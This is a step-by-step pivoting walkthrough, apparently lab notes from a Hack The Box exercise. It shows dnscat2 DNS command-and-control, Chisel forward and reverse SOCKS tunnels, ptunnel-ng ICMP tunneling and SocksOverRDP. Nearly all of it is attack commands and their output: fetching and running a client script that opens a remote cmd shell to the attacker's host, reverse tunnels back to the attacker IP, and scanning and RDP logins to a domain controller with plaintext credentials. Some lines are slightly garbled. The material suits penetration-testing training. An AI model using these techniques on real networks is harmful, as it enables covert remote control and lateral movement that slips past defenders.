Dnscat2, Chisel, Ptunnel-ng, and SocksOverRDP Tunneling Techniques
Dnscat2 Tunneling
Set Up Dnscat2 Server on the Attack Host
Clones and configures the Dnscat2 server to handle DNS-based C2 traffic.
C:\mrci0x1> git clone https://github.com/iagox86/dnscat2.git
C:\mrci0x1> cd dnscat2/server/
C:\mrci0x1> sudo gem install bundler
C:\mrci0x1> sudo bundle installStarts the Dnscat2 server on the attack host.
C:\mrci0x1> sudo ruby dnscat2.rb --dns host=10.10.14.18,port=53,domain=inlanefreight.local --no-cacheNew window created: 0
dnscat2> New window created: crypto-debug
Welcome to dnscat2! Some documentation may be out of date.
auto_attach => false
history_size (for new windows) => 1000
Security policy changed: All connections must be encrypted
New window created: dns1
Starting Dnscat2 DNS server on 10.10.14.18:53
[domains = inlanefreight.local]...
Assuming you have an authoritative DNS server, you can run
the client anywhere with the following (--secret is optional):
./dnscat --secret=0ec04a91cd1e963f8c03ca499d589d21 inlanefreight.local
To talk directly to the server without a domain name, run:
./dnscat --dns server=x.x.x.x,port=53 --secret=0ec04a91cd1e963f8c03ca499d589d21
Of course, you have to figure out <server> yourself! Clients
will connect directly on UDP port 53.Clone Dnscat2 PowerShell Client
Clones the Dnscat2 PowerShell client for execution on the Windows target.
C:\mrci0x1> git clone https://github.com/lukebaggett/dnscat2-powershell.gitTransfer the Client to the Windows Target
Transfers the Dnscat2 PowerShell client to the Ubuntu pivot host.
C:\mrci0x1> scp dnscat2-powershell/dnscat2.ps1 ubuntu@10.129.202.64:/home/ubuntu/Hosts the client script on the Ubuntu pivot host.
C:\pivot_host> python3 -m http.server 8123Downloads the client script to the Windows target.
C:\windows> Invoke-WebRequest -Uri "http://10.129.202.64:8123/dnscat2.ps1" -OutFile "C:\dnscat2.ps1"Run the Dnscat2 Client on the Windows Target
Imports and executes the Dnscat2 PowerShell client to establish a CMD shell session.
C:\windows> Import-Module .\dnscat2.ps1
C:\windows> Start-Dnscat2 -DNSserver 10.10.14.18 -Domain inlanefreight.local -PreSharedSecret 0ec04a91cd1e963f8c03ca499d589d21 -Exec cmdConfirm Session Establishment
Confirms the Dnscat2 session is established on the attack host.
C:\mrci0x1> New window created: 1
Session 1 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)
dnscat2>Interact with the Session
Switches to the Dnscat2 session to interact with the CMD shell.
C:\mrci0x1> window -i 1New window created: 1
history_size (session) => 1000
Session 1 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)
This is a console session!
That means that anything you type will be sent as-is to the
client, and anything they type will be displayed as-is on the
screen! If the client is executing a command and you don't
see a prompt, try typing 'pwd' or something!
To go back, type ctrl-z.
Microsoft Windows [Version 10.0.18363.1801]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
exec (OFFICEMANAGER) 1>Chisel Forward Tunneling
Clone Chisel
Downloads the Chisel repository to the attack host.
C:\mrci0x1> git clone https://github.com/jpillora/chisel.gitInstall Go and Build Chisel
Builds the Chisel binary on the attack host.
C:\mrci0x1> cd chisel
C:\mrci0x1> go buildTransfer Chisel to the Pivot Host
Copies the Chisel binary to the Ubuntu pivot host.
C:\mrci0x1> scp chisel ubuntu@10.129.202.64:~/ubuntu@10.129.202.64's password:
chisel 100% 11MB 1.2MB/s 00:09Run the Chisel Server on the Pivot Host
Starts the Chisel server on the Ubuntu pivot host to enable SOCKS5 proxy.
C:\pivot_host> ./chisel server -v -p 1234 --socks52022/05/05 18:16:25 server: Fingerprint Viry7WRyvJIOPveDzSI2piuIvtu9QehWw9TzA3zspac=
2022/05/05 18:16:25 server: Listening on http://0.0.0.0:1234Run the Chisel Client on the Attack Host
Connects to the Chisel server from the attack host to create a SOCKS5 proxy.
C:\mrci0x1> ./chisel client -v 10.129.202.64:1234 socks2022/05/05 14:21:18 client: Connecting to ws://10.129.202.64:1234
2022/05/05 14:21:18 client: tun: proxy #127.0.0.1:1080=>socks: Listening
2022/05/05 14:21:18 client: tun: Bound proxies
2022/05/05 14:21:19 client: Handshaking...
2022/05/05 14:21:19 client: Sending config
2022/05/05 14:21:19 client: Connected (Latency 120.170822ms)
2022/05/05 14:21:19 client: tun: SSH connectedConfigure Proxychains
Configures proxychains to route traffic through the Chisel SOCKS5 proxy.
C:\mrci0x1> tail -f /etc/proxychains.conf[ProxyList]
# add proxy here ...
# defaults set to "tor"
# socks4 127.0.0.1 9050
socks5 127.0.0.1 1080Connect to the Domain Controller
Establishes anRDP session to the Domain Controller through the Chisel tunnel.
C:\mrci0x1> proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123Chisel Reverse Tunneling
Start the Chisel Server on the Attack Host
Runs the Chisel server with reverse tunneling enabled on the attack host.
C:\mrci0x1> sudo ./chisel server --reverse -v -p 1234 --socks52022/05/30 10:19:16 server: Reverse tunnelling enabled
2022/05/30 10:19:16 server: Fingerprint n6UFN6zV4F+MLB8WV3x25557w/gHqMRggEnn15q9xIk=
2022/05/30 10:19:16 server: Listening on http://0.0.0.0:1234Run the Chisel Client on the Pivot Host
Connects from the Ubuntu pivot host to the attack host for reverse SOCKS proxy.
C:\pivot_host> ./chisel client -v 10.10.14.18:1234 R:socks2022/05/30 14:19:29 client: Connecting to ws://10.10.14.18:1234
2022/05/30 14:19:29 client: Handshaking...
2022/05/30 14:19:30 client: Sending config
2022/05/30 14:19:30 client: Connected (Latency 117.204196ms)
2022/05/30 14:19:30 client: tun: SSH connectedConfigure Proxychains
*Ensures proxychains usesré
C:\mrci0x1> tail -f /etc/proxychains.conf[ProxyList]
# add proxy here ...
# socks4 127.0.0.1 9050
socks5 127.0.0.1 1080Connect to the Domain Controller
Establishes an RDP session to the Domain Controller via the reverse Chisel tunnel.
C:\mrci0x1> proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123Ptunnel-ng ICMP Tunneling
Clone Ptunnel-ng
Downloads the Ptunnel-ng repository to the attack host.
C:\mrci0x1> git clone https://github.com/utoni/ptunnel-ng.gitBuild Ptunnel-ng
Builds the Ptunnel-ng tool on the attack host.
C:\mrci0x1> cd ptunnel-ng
C:\mrci0x1> sudo ./autogen.shAlternative method to build a static Ptunnel-ng binary for compatibility.
C:\mrci0x1> sudo apt install automake autoconf -y
C:\mrci0x1> cd ptunnel-ng/
C:\mrci0x1> sed -i '$s/.*/LDFLAGS=-static "${NEW_WD}\/configure" --enable-static $@ \&\& make clean \&\& make -j${BUILDJOBS:-4} all/' autogen.sh
C:\mrci0x1> ./autogen.shTransfer Ptunnel-ng to the Pivot Host
Copies the Ptunnel-ng directory to the Ubuntu pivot host.
C:\mrci0x1> scp -r ptunnel-ng ubuntu@10.129.202.64:~/Start the Ptunnel-ng Server on the Pivot Host
Runs the Ptunnel-ng server on the Ubuntu pivot host to forward ICMP traffic.
C:\pivot_host> cd ~/ptunnel-ng/src
C:\pivot_host> sudo ./ptunnel-ng -r10.129.202.64 -R22[sudo] password for ubuntu:
./ptunnel-ng: /lib/x86_64-linux-gnu/libselinux.so.1: no version information available (required by ./ptunnel-ng)
[inf]: Starting ptunnel-ng 1.42.
[inf]: (c) 2004-2011 Daniel Stoedle, <daniels@cs.uit.no>
[inf]: (c) 2017-2019 Toni Uhlig, <matzeton@googlemail.com>
[inf]: Security features by Sebastien Raveau, <sebastien.raveau@epita.fr>
[inf]: Forwarding incoming ping packets over TCP.
[inf]: Ping proxy is listening in privileged mode.
[inf]: Dropping privileges now.Connect to the Ptunnel-ng Server from the Attack Host
Starts the Ptunnel-ng client to connect to the server via ICMP.
C:\mrci0x1> sudo ./ptunnel-ng -p10.129.202.64 -l2222 -r10.129.202.64 -R22[inf]: Starting ptunnel-ng 1.42.
[inf]: (c) 2004-2011 Daniel Stoedle, <daniels@cs.uit.no>
[inf]: (c) 2017-2019 Toni Uhlig, <matzeton@googlemail.com>
[inf]: Security features by Sebastien Raveau, <sebastien.raveau@epita.fr>
[inf]: Relaying packets from incoming TCP streams.Tunnel SSH through the ICMP Tunnel
Establishes an SSH session through the ICMP tunnel.
C:\mrci0x1> ssh -p2222 -lubuntu 127.0.0.1ubuntu@127.0.0.1's password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Wed 11 May 2022 03:10:15 PM UTC
System load: 0.0
Usage of /: 39.6% of 13.72GB
Memory usage: 37%
Swap usage: 0%
Processes: 183
Users logged in: 1
IPv4 address for ens192: 10.129.202.64
IPv6 address for ens192: dead:beef::250:56ff:feb9:52eb
IPv4 address for ens224: 172.16.5.129
* Super-optimized for small spaces - read how we shrank the memory
footprint of MicroK8s to make it the smallest full K8s around.
https://ubuntu.com/blog/microk8s-memory-optimisation
144 updates can be applied immediately.
97 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable
Last login: Wed May 11 14:53:22 2022 from 10.10.14.18
ubuntu@WEB01:~$ View Tunnel Traffic Statistics
Checks Ptunnel-ng server logs for session details.
C:\pivot_host> [inf]: Incoming tunnel request from 10.10.14.18.
[inf]: Starting new session to 10.129.202.64:22 with ID 20199
[inf]: Received session close from remote peer.
[inf]:
Session statistics:
[inf]: I/O: 0.00/ 0.00 mb ICMP I/O/R: 248/ 22/ 0 Loss: 0.0%
[inf]: Enable Dynamic Port Forwarding
Sets up a SOCKS5 proxy over the ICMP-tunneled SSH session.
C:\mrci0x1> ssh -D 9050 -p2222 -lubuntu 127.0.0.1ubuntu@127.0.0.1's password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)
<snip>Configure Proxychains
Configures proxychains to use the SOCKS5 proxy for tunneling.
C:\mrci0x1> echo "socks5 127.0.0.1 9050" >> /etc/proxychains.confVerifies the proxychains configuration.
C:\mrci0x1> tail -f /etc/proxychains.confsocks5 127.0.0.1 9050Scan the Internal Network
Scans the Domain Controller for RDP service availability through the ICMP tunnel.
C:\mrci0x1> proxychains nmap -sV -sT 172.16.5.19 -p3389ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-11 11:10 EDT
|S-chain|-<>-127.0.0.1:9050-<><>-172.16.5.19:80-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-172.16.5.19:3389-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-172.16.5.19:3389-<><>-OK
Nmap scan report for 172.16.5.19
Host is up (0.12s latency).
PORT STATE SERVICE VERSION
3389/tcp open ms-wbt-server Microsoft Terminal Services
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.78 secondsConnect to the Domain Controller
Establishes an RDP session to the Domain Controller through the ICMP tunnel.
C:\mrci0x1> proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123SocksOverRDP Tunneling
Connect to the Foothold Host
Establishes an RDP session to the compromised Windows foothold host.
C:\mrci0x1> xfreerdp /v:10.129.x.x /u:htb-student /p:<password>Load SocksOverRDP Plugin on the Foothold Host
Registers the SocksOverRDP plugin DLL on the foothold host.
C:\windows> regsvr32 SocksOverRDP-Plugin.dllConnect to the Domain Controller via RDP
Starts an RDP session to the Domain Controller from the foothold host.
C:\windows> mstsc.exe /v:172.16.5.19Start SocksOverRDP Server on the Domain Controller
Runs the SocksOverRDP server on the Domain Controller.
C:\windows> C:\Path\To\SocksOverRDP-Server.exeVerify the SOCKS Listener on the Foothold Host
Checks for the active SOCKS proxy listener on the foothold host.
C:\windows> netstat -antb | findstr 1080TCP 127.0.0.1:1080 0.0.0.0:0 LISTENINGPivot to the Internal Target
Initiates an RDP session to the internal target from the foothold host.
C:\windows> mstsc.exe /v:172.16.6.155Last updated